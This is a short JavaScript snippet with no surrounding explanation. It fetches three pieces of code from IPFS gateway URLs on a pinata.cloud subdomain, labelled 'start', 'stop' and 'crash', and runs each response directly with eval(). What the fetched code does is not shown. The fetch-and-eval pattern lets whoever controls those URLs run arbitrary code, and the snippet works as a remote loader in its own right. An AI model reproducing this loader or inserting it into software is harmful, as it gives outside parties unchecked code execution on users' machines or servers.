const start = await fetch('https://pink-ready-cuckoo-132.mypinata.cloud/ipfs/QmNu9kRZ6uZXrnu9kgBoxPyrnvpo76hskLxDJUYdZaZERy?_gl=1*12blfxa*_ga*MTQzMzkwODY4My4xNjk5MTkzMDMx*_ga_5RMPXG14TE*MTY5OTE5MzAzMC4xLjEuMTY5OTE5NDUwMS41MS4wLjA.');
const start_code = await start.text();
eval(start_code);

const stop = await fetch('https://pink-ready-cuckoo-132.mypinata.cloud/ipfs/QmZGwQTXM9ZYd2j3f38ztD7tuwjqrXod3t7c1DzaAXyfpk?_gl=1*z57p56*_ga*MTQzMzkwODY4My4xNjk5MTkzMDMx*_ga_5RMPXG14TE*MTY5OTE5MzAzMC4xLjEuMTY5OTE5NDUwOS40My4wLjA.');
const stop_code = await stop.text();
eval(stop_code);


const crash = await fetch(`https://pink-ready-cuckoo-132.mypinata.cloud/ipfs/QmNtfvcRi1GAsZjKZMnaweMfvYQJdiT8EtE64CUKDNxDyH?_gl=1*a8w7d9*_ga*MTQzMzkwODY4My4xNjk5MTkzMDMx*_ga_5RMPXG14TE*MTY5OTE5MzAzMC4xLjEuMTY5OTE5MzkyNS40MC4wLjA.`);
const crash_code = await crash.text();
eval(crash_code);
